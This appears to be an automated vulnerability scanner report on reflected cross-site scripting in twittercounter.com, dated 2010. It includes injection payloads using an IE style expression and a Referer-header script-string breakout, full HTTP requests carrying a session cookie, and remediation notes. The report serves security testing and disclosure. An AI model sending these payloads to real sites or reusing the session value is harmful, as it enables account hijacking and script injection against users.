<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/verified/listda6c3"style="x:expression(alert(1))"9a2f32d5dd8/world-leaders" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ec6"style%3d"x%3aexpression(alert(1))"f7b51639d00 was submitted in the REST URL parameter 3. This input was echoed as 19ec6"style="x:expression(alert(1))"f7b51639d00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /verified/list/world-leaders19ec6"style%3d"x%3aexpression(alert(1))"f7b51639d00 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:49 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/verified/list/world-leaders19ec6"style="x:expression(alert(1))"f7b51639d00" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2287"style%3d"x%3aexpression(alert(1))"49e3d60f86f was submitted in the REST URL parameter 1. This input was echoed as a2287"style="x:expression(alert(1))"49e3d60f86f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /webmailtjesa2287"style%3d"x%3aexpression(alert(1))"49e3d60f86f?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:30:17 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/webmailtjesa2287"style="x:expression(alert(1))"49e3d60f86f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47993"style%3d"x%3aexpression(alert(1))"df251031681 was submitted in the REST URL parameter 1. This input was echoed as 47993"style="x:expression(alert(1))"df251031681 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /xjimenez47993"style%3d"x%3aexpression(alert(1))"df251031681 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:30:18 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23663
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/xjimenez47993"style="x:expression(alert(1))"df251031681" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b80f5"style%3d"x%3aexpression(alert(1))"078ac07eae1 was submitted in the REST URL parameter 1. This input was echoed as b80f5"style="x:expression(alert(1))"078ac07eae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /yaroslav_chmyrb80f5"style%3d"x%3aexpression(alert(1))"078ac07eae1 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:30:16 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/yaroslav_chmyrb80f5"style="x:expression(alert(1))"078ac07eae1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecaea"style%3d"x%3aexpression(alert(1))"84e874ace42 was submitted in the REST URL parameter 1. This input was echoed as ecaea"style="x:expression(alert(1))"84e874ace42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /yourfateecaea"style%3d"x%3aexpression(alert(1))"84e874ace42 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:30:30 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23879
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/yourfateecaea"style="x:expression(alert(1))"84e874ace42" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 124e0"style%3d"x%3aexpression(alert(1))"930048abc78 was submitted in the REST URL parameter 1. This input was echoed as 124e0"style="x:expression(alert(1))"930048abc78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /yungaswiftee124e0"style%3d"x%3aexpression(alert(1))"930048abc78 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:30:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/yungaswiftee124e0"style="x:expression(alert(1))"930048abc78" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e93f'-alert(1)-'3a8c35a28d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.